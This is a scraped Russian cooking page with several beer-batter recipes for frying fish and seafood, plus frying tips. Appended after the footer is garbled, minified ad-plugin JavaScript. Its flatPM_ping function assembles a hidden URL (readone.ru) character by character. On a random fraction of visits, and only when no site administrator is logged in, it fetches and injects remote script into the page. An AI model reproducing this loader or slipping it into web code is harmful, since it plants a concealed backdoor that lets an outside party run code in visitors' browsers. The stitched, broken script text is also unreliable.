Рыба в пивном кляре

Французский пивной кляр для рыбы, курицы, другого мяса и овощей

Кляр – жидкое тесто для обжарки мелких порций продуктов в раскаленном растительном масле. Правильно сделанный кляр на пиве имеет легкий солодовый аромат и пикантную горчинку, а еще сохраняет форму кусочка и сочность блюда внутри, формируя при обжарке аппетитную хрустящую корочку.

Предложенный рецепт пивного кляра подходит для обжарки: любой морской и речной рыбы, креветок, рыбных и крабовых палочек, куриного филе, крылышек или грудки, отбивных из свинины и говядины, а также кусочков сладкого перца, баклажанов, кабачков, брокколи, цветной и брюссельской капусты, шампиньонов и луковых колец.

  • используйте только светлое пиво с небольшой горечью, иначе кляр получится слишком горьким;
  • все жидкие ингредиенты для приготовления пивного кляра, включая яйца, должны быть холодными, чтобы при контакте с разогретым на сковородке маслом создавался контраст температур, что способствует формированию хрустящей корочки;
  • взбитые белки делают кляр воздушным и пышным;
  • продукты длительного приготовления, например, рыбу и мясо, нужно сначала довести до готовности и только после этого обжаривать в кляре;
  • готовьте кляр перед самой обжаркой продуктов, он не должен стоять дольше 15-20 минут.

Рецепт кляра на пиве

Ингредиенты:

  • светлое пиво – 250 мл;
  • куриные яйца – 2 штуки;
  • пшеничная мука – 1 стакан;
  • растительное масло – 2 столовые ложки;
  • карри (приправа) – 1 щепотка (по желанию);
  • черный молотый перец – по вкусу (необязательно);
  • соль – 1 щепотка.

Технология приготовления

1. Охладить пиво и куриные яйца в холодильнике. Муку просеять.

2. Поместить муку в глубокую миску. Всыпать черный молотый перец и карри. Перемешать.

3. Отделить белки от желтков.

4. Сделать в муке углубление, в которое влить пиво, затем добавить желтки и растительное масло.

5. В белки всыпать соль и взбить в однородную стойкую пену.

6. Влить белки в муку. Перемешать вилкой, венчиком или миксером до однородной, слегка вязкой консистенции. В случае необходимости добавить чуть больше муки. Пивной кляр готов!

Обжарка

7. Обвалять заготовки в кляре. Из влажных кусочков тесто стекает, поэтому овощи, мясо или рыбу сначала лучше обсушить бумажными полотенцами. Если такой возможности нет, перед нанесением кляра заготовки слегка присыпают мукой.

8. Раскалить растительное масло на сковородке или во фритюре (до появления дымка).

Внимание! Если масло плохо прогреется, то после обжарки блюдо получится очень жирным, потому что впитает слишком много масла. При нормальном прогреве под действием высокой температуры за несколько секунд сформируется корочка, которая не пустит масло во внутрь.

9. При обжарке в пивном кляре рыбы или мяса кусочки не должны соприкасаться друг с другом.

10. Длительность обжарки – 1-3 минуты с каждой стороны до появления золотистой корочки. Готовые кусочки выловить шумовкой и выложить на бумажное полотенце, чтобы убрать излишки жира.

Рыбное филе в пивном кляре

Как приготовить воздушный кляр для рыбы? Как сделать, чтобы он был хрустящим? Все просто — добавьте пива и не забудьте взбить белки. Пивной кляр будет обволакивать каждый кусочек тонким слоем, у него будет хрустящая текстура, а само филе останется очень сочным и нежным.

В кляре из светлого пива можно приготовить филе любой белой рыбы — хек, минтай, тилапия и пр. Подойдет он и для жарки луковых колец, кальмаров и креветок. Кляр получается воздушным, хорошо держится, не сползает. Дрожжи, содержащиеся в пиве, делают его рыхлым, а взбитые белки — воздушным.

Чтобы рыба в кляре была хрустящей, жарьте ее в большом количестве кипящего масла, тогда на поверхности начнет сразу образовываться аппетитная корочка. Конечно, назвать это блюдо диетическим никак нельзя, но зато как вкусно!

Ингредиенты

  • филе белой рыбы – 700 г
  • лимонный сок – 1-2 ч. л.
  • куриные яйца – 2 шт.
  • пшеничная мука – 170 г
  • светлое пиво – 250 г
  • молотая сладкая паприка – 1 ч. л.
  • соль – по вкусу
  • перец черный молотый – 1-2 щеп.
  • растительное масло для фритюра – 500 мл

Приготовление

Рыбу разморозьте, удалите внутренности, кожу и кости. Филе обмакните бумажными полотенцами. Если вы используете покупное замороженное филе (в глазури), то после размораживания рекомендую его отжать руками от лишней жидкости, тогда рыба будет плотнее и на ней лучше удержится кляр, он не будет растекаться и сползать.

Рыбное филе нарежьте небольшими продолговатыми кусочками, посыпьте солью (лучше морской) и молотым черным перцем, сбрызните лимонным соком — он добавит кислинку и сделает мясо рыбы немного плотнее.

Приготовьте кляр для рыбы на светлом пиве. Разделите желтки и белки. В миске соедините: желтки, немного соли и перца, а также сладкую молотую паприку (она даст красивый цвет жареной рыбке). Размешайте до однородности венчиком.

Затем влейте холодное (!) пиво, сразу же просейте в миску муку — добавляйте частями, размешивая венчиком, чтобы не было комочков.

Отдельно взбейте белки до пены с помощью миксера. Добавьте их в пивной кляр и перемешайте лопаткой (не венчиком!).

Получится воздушное тесто с множеством пузырьков. Сразу же приступайте к обжариванию — это очень важный момент, нельзя оставлять кляр стоять на столе долгое время, иначе он потеряет свою воздушность. Как только он будет готов, сразу же переходите к следующему этапу, не медля.

Разогрейте в глубокой сковороде, сотейнике или в кастрюле рафинированное растительное масло для фритюра. Обратите внимание, что масло должно быть прогрето как можно сильнее, до кипения, тогда рыба в кляре не впитает в себя много жира. Окунайте каждый кусочек рыбы в тесто, а затем аккуратно выкладывайте в раскаленный фритюр.

Обжаривайте рыбу в кляре несколько минут до золотистого цвета, переворачивая лопаткой. Со всех сторон она должна подрумяниться.

Выложите рыбу на бумажное полотенце, чтобы удалить лишний жир. Сверху ничем не накрывайте! Иначе корочка размякнет и не будет хрустеть.

Подавайте рыбу, жареную в кляре, сразу же после приготовления или в холодном виде, со своим любимым соусом или просто с горчицей. Приятного аппетита!

Пивной кляр для рыбы

4 минуты Автор: Юлия Литвиненко 0

Кляр – это жидкое тесто, в основе которого яйца и мука. Обмакивают продукты перед жаркой на сковороде или во фритюре. До нужной консистенции доводится с помощью различных жидкостей – молока, реже воды. Но для придания аппетитных ноток часто используется хмельной напиток.

Именно этот компонент позволяет избавиться от специфического вкуса, кляр на пиве для рыбы сохраняет сочность продукта.

Классический пивной кляр

  • 2 яйца;
  • 200 мл светлого пива;
  • 200 гр. муки;
  • соль, перец – по вкусу.
  1. Пивной кляр для рыбы готовится непосредственно перед обжариванием, иначе он потеряет свою воздушную консистенцию.
  2. Муку просеять через сито, затем смешать с солью, перцем. Если не использовать в кляре пряности, корочка получится пресной. Отдельно нужно солить и рыбное филе, иначе блюдо получится безвкусным.
  3. Взбить миксером или венчиком яйца до получения густой пены. Постепенно добавлять хмельной напиток, не переставая перемешивать.
  4. Затем соединить муку с жидкой массой, интенсивно взбивать. Важно, чтобы в результате тесто стало однородной консистенции без комочков.
  5. После можно приступать к процессу обжаривания рыбы.

По-баварски

  • 3 желтка;
  • 150 мл пива;
  • 50 мл молока;
  • 200 гр. муки;
  • 10 мл растительного масла;
  • соль, перец, мускатный, орех – по вкусу.
  1. Для баварского рецепта рыбы в пивном кляре лучше выбирать ржаные, пшеничные сорта напитка. Тогда вкус корочки получится пикантным, можно использовать для разных видов рыб, в том числе и пресноводных.
  2. Молоко с пивом должно быть примерно одной температуры, за полчаса до начала приготовления рекомендуется достать продукты из холодильника.
  3. Соединить напитки с растительным маслом, хорошенько перемешать венчиком, ввести соль и специи.
  4. Отдельно взбить желтки с мукой до получения густого однородного теста.
  5. Затем смешать все ингредиенты, кляр должен быть достаточно густой и вязкий, как на оладьи.
  6. Оставить на полчаса охлаждаться, в это время можно замариновать рыбку, после приступать к обжариванию во фритюре. Для приготовления простого рецепта лучше выбирать морские сорта рыб.

Пряный

  • 100 мл нефильтрованного пива;
  • 3 яйца;
  • 250 гр. муки;
  • 100 мл сливок;
  • 10 гр. смеси кориандра, тмина, сушеного укропа, петрушки;
  • соль – по вкусу.
  1. Обжаривать рыбу на пиве можно на рафинированном подсолнечном масле. Но особый вкус приобретает блюдо, если использовать кунжутное масло.
  2. Пенный напиток взбить со сливками венчиком, постепенно добавлять специи и вкус.
  3. Муку рекомендуется просевать не только для устранения примесей, но и для того, чтобы кляр получился пышный, воздушный.
  4. Затем следует взбить миксером яйца, после образования пены можно вводить просеянную муку.
  5. Смешать все ингредиенты в одной посуде, довести до однородной консистенции. Готовое жидкое тесто должно быть средней консистенции.
  6. После приготовления кляр необходимо охладить, для этого необходимо поставить в кастрюлю со льдом.
  7. Через 10-15 минут можно приступать к обжариванию рыбы, лучше выбирать сорта с нейтральным вкусом, в этом случае пряности максимально раскроются.

Кляр на пиве и минеральной воде

  • 100 мл светлого пива;
  • 100 мл Боржоми;
  • яйцо;
  • 100 гр. гречишной муки;
  • 100 гр. панировочных сухарей;
  • 5 гр. куркумы;
  • 5 гр. петрушки;
  • 10 гр. соли.
  1. Выполнение пошагового рецепта позволит приготовить вкусный, хрустящий кляр. Вместо куркумы можно использовать красный перец, кориандр или готовую приправу для рыбы.
  2. Соединить пряности с солью, тщательно перемешать вместе с мукой и панировочными сухарями. Использование именно этих ингредиентов позволит добиться красивой золотистой корочки.
  3. Отдельно смешать пиво с минералкой, яйцо взбить венчиком.
  4. Перелить все компоненты в одну посуду, тщательно перемешать.
  5. Обязательно охладить полученное тесто в течение часа, это позволит добиться более густой консистенции.
  6. Филе следует нанизать вилкой, обмакнуть, дать лишнему стечь, а затем повторить процесс. Это поможет сохранить сочность мяса.
  7. Кроме рыбы можно приготовить морепродукты, кольца кальмаров станут отлично закуской. А на обжаривание деликатесов потребуется потратить не более 3 минут.

Секрет хрустящего, румяного кляра заключается в контрасте температур. Холодное тесто и горячее масло на раскаленной сковороде позволяют добиться идеальной корочки.

Простые рецепты кляра на пиве для рыбы. Обжарка и советы

Не секрет, что под холодное пиво хорошей закуской станут рыба или морепродукты. А если рыба будет еще и хрустящая, золотистая, ароматная и на пивном кляре – то перед таким блюдом не устоит даже истинный гурман. Все секреты приготовления отличного кляра, а также разнообразные рецепты на любой вкус вы найдете в этой статье.

Простые варианты

Кляр – это тесто жидкой консистенции для обжаривания в раскаленном жиру. Пивной кляр обвалакивает рыбу, сохраняя при обжаривании ее форму, нежность и сочность. Основной составляющей пивного теста является, непосредственно, сам хмельной напиток, яйца, мука и молоко или вода.

Чтобы кляр не получился пресным и безвкусным, нужно использовать пряные специи. Для пресноводной рыбы хорошо подойдут петрушка, лавровый лист. сельдерей, а для морской – шафран, базилик, другие французские травы и укроп. Черный перец прибавит пикантности любому сорту рыбы.

Классический

Далее можно ознакомиться с пошаговым приготовлением.

Ингредиенты:

  • светлое пиво – 200 мл;
  • мука – 200 грамм;
  • яйца – 2 штуки;
  • перец и соль – по вкусу.

Приготовление:

  1. Просеять муку через сито, добавить перец и соль.
  2. Взбить яйца венчиком до густой и воздушной пены. Медленно добавлять пиво, аккуратно перемешивая.
  3. Добавить в полученную массу муку и тщательно взбивать. Тесто должно получиться без комочков, однородной массы.
  4. Посолить, поперчить рыбу, обмакнуть ее в консистенцию и обжаривать.

Далее предлагаем наглядное видео с приготовлением кляра по классическому рецепту с пивом:

По-баварски

Секрет румяного, ароматного и хрустящего кляра в использовании разных температур: холодное тесто из холодильника и горячее масло помогают добиться желаемого результата.

Ингредиенты:

  • пиво – 150 мл;
  • молоко – 50 мл;
  • мука – стакан ( или 200 грамм);
  • желтки яиц – 3 штуки;
  • растительное масло – 10 мл;
  • перец, соль, орех мускатный – по вкусу.

Приготовление:

  1. За 30-40 минут до приготовления достаньте молоко и пиво из холодильника, чтобы они успели согреться до комнатной температуры.
  2. Смешать хмельной напиток, молоко и растительное масло, перемешать венчиком , добавить все специи.
  3. Взбить желтки, постепенно добавляя муку. В результате должна получиться однородная воздушная масса, как тесто.
  4. Добавить к тесту смешанные ингредиенты, можно еще раз взбить. Баварский кляр должен быть густым и вязким.
  5. Поставить кляр в холодильник на 30 минут.
  6. Обжаривать рыбу в ароматном тесте.

Пряный

Ингредиенты:

  • пиво светлое – 100 мл;
  • яйца – 3 штуки;
  • мука пшеничная – 250 грамм;
  • сливки – 100 мл ( полстакана);
  • пряности: кориандр, черный перец, петрушка и укроп сушеные из пакетика, тмин – по вкусу;
  • соль – по вкусу.

Приготовление:

  1. Взбить миксером или венчиком хмельной напиток со сливками, добавляя пряности и соль.
  2. Взбить яйца до получения однородной массы и пены, ввести аккуратно муку.
  3. Взбить все полученные игредиенты в одной таре до однородной, слегка жидковатой консистенции.
  4. Отправить кляр на полчаса в холодильник.
  5. Окунать рыбу в консистенцию и обжаривать.

С Боржоми

Данным способом можно приготовить любую рыбу, кальмары, креветки и любые другие морепродукты.

Игредиенты:

  • пиво светлое – 100 мл;
  • Боржоми – 100 мл;
  • мука гречишная – 100 грамм;
  • яйцо – 1 штука;
  • сухари панировочные – 100 грамм;
  • специи: петрушка сушеная, куркума, перец черный, соль – по вкусу.

Приготовление:

  1. Хорошо перемешать панировочные сухари ( их можно сделать и самим), пряности и соль с мукой.
  2. Боржоми и пиво смешать вместе.
  3. Взбить яйцо или миксером, или венчиком.
  4. Соединить все полученные массы в одну, тщательно перемешать. Консистенция должна получиться густой и вязкой.
  5. Оставить кляр в холодильнике , лучше всего на 60 минут.
  6. Перед обжаркой, окунуть рыбу в массу, дать стечь лишней жидкости и снова обмакнуть. Так рыба останется сочной.
  7. Жарить кусочек примерно 3 минуты с каждой стороны.

Кружевной без яиц

Ингредиенты:

  • пиво светлое – 500 мл;
  • масло растительное – 10 мл;
  • мука – 250 грамм;
  • специи: черный перец, куркума, соль – по вкусу;
  • зелень свежая рубленая – по вкусу.

Приготовление:

  1. Насыпать просеянную муку в глубокую чашу, смешать ее с пряностями и сделать углубление.
  2. Аккуратно влить холодное светлое пиво.
  3. Добавить масло и перемешать тесто до однородной консистенции. Можно взбить кляр миксером или венчиком.
  4. Окунуть рыбу в полученную смесь и обжарить до готовности.
  5. Сверху посыпать рубленой зеленью.

По-французски

Игредиенты:

  • пиво светлое – 250 мл;
  • желтки яиц – 2 штуки;
  • белки яиц – 2 штуки;
  • мука – 200 грамм;
  • масло растительное – 2 столовых ложки;
  • сыр твердый – 150 грамм.
  • приправы: соль, карри, французские травы, черный перец – по вкусу.

Приготовление:

  1. Взбить белки яиц в воздушную пену.
  2. Смешать пиво, желтки и белки, хорошо взбить миксером.
  3. Медленно всыпать муку, специи и влить растительное масло. Тщательно перемешать, до получения однородной консистенции.
  4. Добавить сыр и продолжать мешать.
  5. Оставить кляр в холодильнике на 40 минут.
  6. Окунать рыбу в однородную смесь и жарить до золотистой корочки.

Обжарка

Чтобы рыба в хрустящем тесте не разваливалась, нужно соблюдать правила обжарки:

  1. Необходимо хорошо раскалить сковороду и прогреть масло ( до пузырьков).
  2. Рыбу окунаем в кляр непосредственно перед обжариванием.
  3. Лучше окунуть в кляр кусочки рыбы несколько раз и дать ему хорошо стечь.
  4. Кусочки рыбы в пивном кляре должны находиться друг от друга на расстоянии, не пытайтесь пожарить всю рыбу в один присест.
  5. Жарить нужно по 2- 3 минут с каждой стороны, до золотистой и хрустящей корочки.
  6. После обжарки промокнуть рыбу бумажными салфетками, дать стечь маслу.
  7. Можно присыпать рыбу мукой, так кляр точно останется на рыбе.
  8. Подавать рыбу стоит сразу после приготовления, так как потом корочка может стать мягкой.
  9. При сервировке посыпать рыбу в пивном кляре зеленью. Можно полить соком лимона.
  10. На гарнир хорошо подойдут рис, картофель и другие овощи.

Полезные советы

  • Все ингредиенты жидкой консистенции в большинстве рецептов кляра на пиве должны быть холодными.
  • Важно использовать разные температуры: холодный кляр и раскаленная сковорода с маслом.
  • Для пивного кляра лучше всего использовать светлые, пшеничные сорта хмельного напитка. Это необходимо для того, чтобы кляр не был горьким.
  • Перед тем, как взбивать яйца, их нужно белки и желтки выложить в разные емкости.

Приготовление рыбы и других морепродуктов в пивном кляре не потребует много времени и хлопот. Простой рецепт для вкусного ужина порадует всех членов семьи и друзей. Главное, чтобы кляр получился хрустящим, необходимо соблюдать все советы по его приготовлению.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};